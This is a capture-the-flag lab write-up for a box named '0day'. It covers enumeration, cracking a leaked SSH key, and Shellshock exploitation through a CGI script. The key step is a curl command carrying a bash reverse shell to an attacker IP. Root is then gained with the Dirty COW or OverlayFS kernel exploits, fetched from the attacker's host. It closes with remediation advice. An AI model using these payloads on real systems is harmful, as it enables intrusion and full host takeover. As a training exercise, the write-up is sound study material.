Target IP: 0day.thm (Requires /etc/hosts entry)
Difficulty: Medium
Objective: User (user.txt) & Root (root.txt) Flags
1. Executive Summary
The target “0day” is an Ubuntu 14.04 server hosting a vulnerable Apache web server. Initial access is gained via the Shellshock vulnerability (CVE-2014-6271) present in a CGI script located at /cgi-bin/test.cgi. Privilege escalation is achieved by exploiting an outdated Linux Kernel (3.13.0) using either Dirty COW (CVE-2016-5195) or OverlayFS (CVE-2015-1328).
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Port enumeration via Nmap.
- T1190 (Exploit Public-Facing App): Shellshock execution via HTTP Headers.
- T1068 (Privilege Escalation): Kernel exploitation (Dirty COW / OverlayFS).
2. Operational Setup (The “Menial” but Critical Steps)
Before interacting with the target, ensure your environment is stable.
A. Host Configuration
Don’t memorize IPs. Map the target to a hostname.
# Replace 10.10.x.x with your target IP
echo "10.10.x.x 0day.thm" | sudo tee -a /etc/hostsB. Terminal Management (Tmux)
- Pane 1 (Ops): For running commands (
nmap,curl). - Pane 2 (Listen):
nc -lvnp 6969(Your callback handler). - Pane 3 (Notes):
vim notes.mdor similar.
3. Enumeration & Discovery
A. Network Scanning
We start with a service version and default script scan.
nmap -sC -sV -oA nmap/0day 0day.thmResults:
- 22/tcp (SSH):
OpenSSH 6.6.1p1(Ubuntu 14.04). - 80/tcp (HTTP):
Apache 2.4.7(Ubuntu). - Observation: Apache 2.4.7 is quite old. The OS version (Ubuntu) hints at an older kernel.
B. Web Enumeration
We perform directory brute-forcing to map the application structure.
# Using secLists 'raft-small-words' is efficient for CTFs
gobuster dir -u http://0day.thm -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x cgi,sh,php,txt -o content/gobuster.outCritical Findings:
/cgi-bin/(Status: 301) -> High Priority./backup/(Status: 301) -> Containsid_rsa(SSH Key)./secret/(Status: 301) -> Likely a rabbit hole./admin/(Status: 301) -> Forbidden/Empty.
C. Vulnerability Scanning (Nikto)
A targeted scan on the web server confirms our suspicion about /cgi-bin.
nikto -h http://0day.thmOutput:
+ OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...
4. Analysis: The “Unused” Rabbit Hole
Most writeups skip this, but a real pentest requires verifying all credentials.
The Asset: An RSA Private Key found in http://0day.thm/backup/id_rsa.
The Check:
- Download & Permissions:
wget http://0day.thm/backup/id_rsa
chmod 600 id_rsa- Crack the Passphrase:
The key is encrypted. We use
ssh2johnandjohnto crack it.
/usr/share/john/ssh2john.py id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hashResult: Passphrase is letmein.
- The Login Attempt: We try to SSH using common usernames derived from the OS (root, ubuntu, www-data) or guessable names (admin, backup).
ssh -i id_rsa ubuntu@0day.thm
# Result: Permission denied (publickey).Conclusion: This is a Dead End. There is no matching user on the system for this key. It serves as a distraction from the web vector.
5. Initial Access: Shellshock
The Mechanics (Why it works)
Shellshock exploits a flaw in Bash where it executes commands appended to function definitions in environment variables.
Apache mod_cgi converts HTTP headers (User-Agent, Referer, etc.) into environment variables (e.g., HTTP_USER_AGENT).
If we send () { :; }; <COMMAND>, the CGI script processes the header, passes it to Bash, and Bash accidentally executes the <COMMAND>.
Manual Exploitation (The Professional Way)
Avoid Metasploit for this. Use curl to understand the traffic.
- Prepare Listener:
nc -lvnp 6969 - Send Payload:
curl -H "User-Agent: () { :; }; /bin/bash -c 'bash -i >& /dev/tcp/10.10.X.X/6969 0>&1'" \
http://0day.thm/cgi-bin/test.cgiNote: If bash -i fails, try sh -i or /bin/sh.
Success: We catch a reverse shell as www-data.
6. Post-Exploitation & Privilege Escalation
A. Stabilization
First, we escape the unstable shell.
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z
stty raw -echo; fg
# Press Enter twice
export TERM=xtermB. Enumeration
uname -a->Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP ... 2014cat /etc/issue->Ubuntu 14.04.1 LTS
Vulnerability: Linux Kernel < 3.19 is highly susceptible to Dirty COW and OverlayFS.
C. Vector 1: Dirty COW (The Standard Path)
This exploits a race condition in the Copy-On-Write mechanism.
- Exploit:
searchsploit dirty cow(Look forcowroot.cor similar). - Problem: The target is missing compilation paths.
- Fix:
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin- Compile & Run:
gcc dirty.c -o dirty -pthread
./dirty
# Enter password 'password123'
su firefartRisk: Dirty COW can sometimes crash the box or leave the filesystem in an unstable state.
D. Vector 2: OverlayFS (The “Better” Path)
This is the “unused” method you asked for. It is often cleaner and more reliable on this specific kernel version (3.13).
Exploit: searchsploit 37292 (CVE-2015-1328).
This exploit leverages the overlayfs filesystem to gain root without the complex race condition of Dirty COW.
- Transfer: Host
37292.con your attacker machine (python3 -m http.server 80). - Download on Target:
cd /tmp
wget http://10.10.X.X/37292.c- Compile:
gcc 37292.c -o overlay- Execute:
./overlayResult: Instant # root shell. No password changing required, less noise.
7. Remediation (Blue Team)
| Vulnerability | Patch / Mitigation |
|---|---|
| Shellshock | Upgrade bash immediately. ( apt-get install --only-upgrade bash). Detect via Snort rules looking for () { :; }; pattern in HTTP headers. |
| DirtyCOW/OverlayFS | Update Linux Kernel to a supported LTS version (e.g., 5.4+). Prevent compilers (gcc) from being accessible to standard users on web servers. |
| SSH Key Exposure | Rotate the compromised key immediately. Ensure backup directories are not web-accessible (chmod 700 and Apache .htaccess deny). |